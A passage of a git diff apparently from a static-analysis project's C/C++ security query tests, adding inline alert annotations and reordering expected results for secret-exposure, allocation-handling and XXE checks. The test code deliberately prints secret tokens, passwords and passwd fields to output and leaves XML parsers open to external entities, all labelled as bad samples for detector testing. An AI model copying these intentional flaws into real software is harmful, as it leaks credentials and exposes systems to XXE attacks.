tests.c:57:21:57:28 | *password | *password | edges | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | provenance | | nodes | tests.c:57:21:57:28 | *password | semmle.label | *password | | tests.c:70:70:70:77 | *password | semmle.label | *password | subpaths -#select -| tests.c:70:70:70:77 | *password | tests.c:57:21:57:28 | *password | tests.c:70:70:70:77 | *password | This operation potentially exposes sensitive system data from $@. | tests.c:57:21:57:28 | *password | *password | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref index 4f7305ce6970..fd804eefffa8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/PotentiallyExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/PotentiallyExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/PotentiallyExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c index 4b1df2a96e1d..b12215c1cb7c 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/SAMATE/tests.c @@ -54,7 +54,7 @@ void CWE535_Info_Exposure_Shell_Error__w32_char_01_bad() if (LogonUserA( username, domain, - password, + password, // $ Source[cpp/potential-system-data-exposure] LOGON32_LOGON_NETWORK, LOGON32_PROVIDER_DEFAULT, &pHandle) != 0) @@ -67,6 +67,6 @@ void CWE535_Info_Exposure_Shell_Error__w32_char_01_bad() printLine("Unable to login."); } /* FLAW: Write sensitive data to stderr */ - fprintf(stderr, "User attempted access with password: %s\n", password); + fprintf(stderr, "User attempted access with password: %s\n", password); // $ Alert[cpp/potential-system-data-exposure] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected index 9756dde70dd3..e678961de2e8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.expected @@ -1,3 +1,21 @@ +#select +| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | +| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | +| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | +| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | +| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | +| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | +| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | +| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | +| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | +| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | +| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | +| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | +| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | +| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | edges | tests.cpp:62:7:62:18 | **global_token | tests.cpp:62:7:62:18 | **global_token | provenance | | | tests.cpp:62:7:62:18 | **global_token | tests.cpp:69:2:69:43 | *... = ... | provenance | | @@ -55,21 +73,3 @@ nodes | tests_passwd.cpp:18:29:18:31 | *pwd | semmle.label | *pwd | | tests_passwd.cpp:19:26:19:28 | *pwd | semmle.label | *pwd | subpaths -#select -| tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | tests.cpp:48:15:48:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:48:15:48:36 | *call to getenv | *call to getenv | -| tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | tests.cpp:49:15:49:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:49:15:49:36 | *call to getenv | *call to getenv | -| tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | tests.cpp:50:15:50:36 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:50:15:50:36 | *call to getenv | *call to getenv | -| tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | tests.cpp:57:18:57:39 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:57:18:57:39 | *call to getenv | *call to getenv | -| tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | tests.cpp:58:41:58:62 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:58:41:58:62 | *call to getenv | *call to getenv | -| tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | tests.cpp:59:43:59:64 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:59:43:59:64 | *call to getenv | *call to getenv | -| tests.cpp:71:27:71:38 | *global_token | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:71:27:71:38 | *global_token | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:73:27:73:31 | *maybe | tests.cpp:62:22:62:27 | *call to getenv | tests.cpp:73:27:73:31 | *maybe | This operation potentially exposes sensitive system data from $@. | tests.cpp:62:22:62:27 | *call to getenv | *call to getenv | -| tests.cpp:88:15:88:17 | *msg | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:88:15:88:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | tests.cpp:97:13:97:34 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:97:13:97:34 | *call to getenv | *call to getenv | -| tests.cpp:111:15:111:17 | *tmp | tests.cpp:131:14:131:35 | *call to getenv | tests.cpp:111:15:111:17 | *tmp | This operation potentially exposes sensitive system data from $@. | tests.cpp:131:14:131:35 | *call to getenv | *call to getenv | -| tests.cpp:119:7:119:12 | *buffer | tests.cpp:132:14:132:35 | *call to getenv | tests.cpp:119:7:119:12 | *buffer | This operation potentially exposes sensitive system data from $@. | tests.cpp:132:14:132:35 | *call to getenv | *call to getenv | -| tests.cpp:124:15:124:17 | *msg | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:124:15:124:17 | *msg | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | tests.cpp:133:14:133:35 | *call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. | tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | -| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | -| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref index 4f7305ce6970..fd804eefffa8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/PotentiallyExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/PotentiallyExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp index 25a071bee467..cebf2d395e36 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp @@ -45,21 +45,21 @@ void test1() { std::ostream cout_copy = std::cout; - std::cout << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable - std::cerr << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable - std::clog << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable + std::cout << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::cerr << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::clog << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert someotherostream << getenv("SECRET_TOKEN"); // GOOD: not output cout_copy << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable [NOT DETECTED] std::cout << getenv("USERPROFILE"); // BAD: outputs PATH environment variable [NOT DETECTED] std::cout << getenv("PATH"); // BAD: outputs PATH environment variable [NOT DETECTED] - std::cout.write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable - (std::cout << "SECRET_TOKEN = ").write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable - std::cout.write("SECRET_TOKEN = ", 7) << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable + std::cout.write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + (std::cout << "SECRET_TOKEN = ").write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::cout.write("SECRET_TOKEN = ", 7) << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert } -char *global_token = getenv("SECRET_TOKEN"); +char *global_token = getenv("SECRET_TOKEN"); // $ Source char *global_other = "Hello, world!"; void test2(bool cond) @@ -68,9 +68,9 @@ void test2(bool cond) maybe = cond ? global_token : global_other; - printf("token = '%s'\n", global_token); // BAD: outputs SECRET_TOKEN environment variable + printf("token = '%s'\n", global_token); // BAD: outputs SECRET_TOKEN environment variable // $ Alert printf("other = '%s'\n", global_other); - printf("maybe = '%s'\n", maybe); // BAD: may output SECRET_TOKEN environment variable + printf("maybe = '%s'\n", maybe); // BAD: may output SECRET_TOKEN environment variable // $ Alert } void test3() @@ -85,7 +85,7 @@ void test3() void myOutputFn(const char *msg) { - printf("%s", msg); + printf("%s", msg); // $ Alert } void myOtherFn(const char *msg) @@ -94,7 +94,7 @@ void myOtherFn(const char *msg) void test4() { - myOutputFn(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable + myOutputFn(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Alert Source myOtherFn(getenv("SECRET_TOKEN")); // GOOD: does not output anything. } @@ -108,7 +108,7 @@ void myOutputFn3(const char *msg) { const char *tmp = msg; - printf("%s", tmp); + printf("%s", tmp); // $ Alert } void myOutputFn4(const char *msg) @@ -116,29 +116,29 @@ void myOutputFn4(const char *msg) char buffer[4096]; sprintf(buffer, "log: %s\n", msg); - puts(buffer); + puts(buffer); // $ Alert } void myOutputFn5(const char *msg) { - printf("%s", msg); + printf("%s", msg); // $ Alert msg = ""; } void test5() { myOutputFn2(getenv("SECRET_TOKEN")); // GOOD: myOutputFn2 doesn't actually output the parameter - myOutputFn3(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable - myOutputFn4(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable - myOutputFn5(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable + myOutputFn3(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Source + myOutputFn4(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Source + myOutputFn5(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Alert Source } void RtlZeroMemory(void* dst, size_t len); void test_clear_memory(char *username) { - char* secret = getenv("SECRET_TOKEN"); + char* secret = getenv("SECRET_TOKEN"); // $ Source - printf("%s", secret); // BAD + printf("%s", secret); // BAD // $ Alert RtlZeroMemory(secret, 1024); printf("%s", secret); // GOOD } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp index 6de8ed84d061..3e3fd2158ce5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp @@ -13,9 +13,9 @@ void test6(char *username) { passwd *pwd; - pwd = getpwnam(username); + pwd = getpwnam(username); // $ Source - printf("pw_passwd = %s\n", pwd->pw_passwd); // BAD - printf("pw_dir = %s\n", pwd->pw_dir); // BAD + printf("pw_passwd = %s\n", pwd->pw_passwd); // BAD // $ Alert + printf("pw_dir = %s\n", pwd->pw_dir); // BAD // $ Alert printf("sizeof(passwd) = %i\n", sizeof(passwd)); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref index fe4bb214bb47..10f5cbc30be5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-570/IncorrectAllocationErrorHandling.ql +query: Security/CWE/CWE-570/IncorrectAllocationErrorHandling.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp index 9df901ca5a9f..f24875a137fa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp @@ -18,7 +18,7 @@ void *operator new(std::size_t, const std::nothrow_t &) noexcept; void *operator new[](std::size_t, const std::nothrow_t &) noexcept; void bad_new_in_condition() { - if (!(new int)) { // BAD + if (!(new int)) { // BAD // $ Alert return; } } @@ -26,53 +26,53 @@ void bad_new_in_condition() { void foo(int**); void bad_new_missing_exception_handling() { - int *p1 = new int[100]; // BAD + int *p1 = new int[100]; // BAD // $ Alert if (p1 == 0) return; - int *p2 = new int[100]; // BAD + int *p2 = new int[100]; // BAD // $ Alert if (!p2) return; - int *p3 = new int[100]; // BAD + int *p3 = new int[100]; // BAD // $ Alert if (p3 == NULL) return; - int *p4 = new int[100]; // BAD + int *p4 = new int[100]; // BAD // $ Alert if (p4 == nullptr) return; - int *p5 = new int[100]; // BAD + int *p5 = new int[100]; // BAD // $ Alert if (p5) {} else return; int *p6; - p6 = new int[100]; // BAD + p6 = new int[100]; // BAD // $ Alert if (p6 == 0) return; int *p7; - p7 = new int[100]; // BAD + p7 = new int[100]; // BAD // $ Alert if (!p7) return; int *p8; - p8 = new int[100]; // BAD + p8 = new int[100]; // BAD // $ Alert if (p8 == NULL) return; int *p9; - p9 = new int[100]; // BAD + p9 = new int[100]; // BAD // $ Alert if (p9 != nullptr) { } else return; int *p10; - p10 = new int[100]; // BAD + p10 = new int[100]; // BAD // $ Alert if (p10 != 0) { } int *p11; do { - p11 = new int[100]; // BAD + p11 = new int[100]; // BAD // $ Alert } while (!p11); int* p12 = new int[100]; @@ -89,11 +89,11 @@ void bad_new_missing_exception_handling() { void bad_new_nothrow_in_exception_body() { try { - new (std::nothrow) int[100]; // BAD - int *p1 = new (std::nothrow) int[100]; // BAD + new (std::nothrow) int[100]; // BAD // $ Alert + int *p1 = new (std::nothrow) int[100]; // BAD // $ Alert int *p2; - p2 = new (std::nothrow) int[100]; // BAD + p2 = new (std::nothrow) int[100]; // BAD // $ Alert } catch (const std::bad_alloc &) { } } @@ -157,7 +157,7 @@ struct Bar { void bad_placement_new_with_exception_handling() { char buffer[1024]; - try { new (buffer) Foo; } // BAD (placement new should not fail) + try { new (buffer) Foo; } // BAD (placement new should not fail) // $ Alert catch (...) { } } @@ -226,7 +226,7 @@ void good_new_with_throwing_call() { void bad_new_with_nonthrowing_call() { try { - int* p1 = new(std::nothrow) int; // BAD + int* p1 = new(std::nothrow) int; // BAD // $ Alert calls_non_throwing(p1); } catch(...) { } @@ -239,7 +239,7 @@ void bad_new_with_nonthrowing_call() { void bad_new_catch_baseclass_of_bad_alloc() { try { - int* p = new(std::nothrow) int; // BAD + int* p = new(std::nothrow) int; // BAD // $ Alert } catch(const std::exception&) { } } @@ -273,7 +273,7 @@ namespace qhelp { // BAD: the allocation will throw an unhandled exception // instead of returning a null pointer. void bad1(std::size_t length) noexcept { - int* dest = new int[length]; + int* dest = new int[length]; // $ Alert if(!dest) { return; } @@ -285,7 +285,7 @@ namespace qhelp { // instead return a null pointer. void bad2(std::size_t length) noexcept { try { - int* dest = new(std::nothrow) int[length]; + int* dest = new(std::nothrow) int[length]; // $ Alert std::memset(dest, 0, length); // ... } catch(std::bad_alloc&) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected index 1376a03ce889..288e811fc737 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected @@ -1,3 +1,34 @@ +#select +| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | +| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | +| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | +| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | +| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | +| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | +| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | +| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | +| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | +| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | +| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | +| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | +| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | +| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | +| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | +| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | +| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | +| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | +| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | +| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | +| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | +| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | +| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | +| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | +| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | +| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) 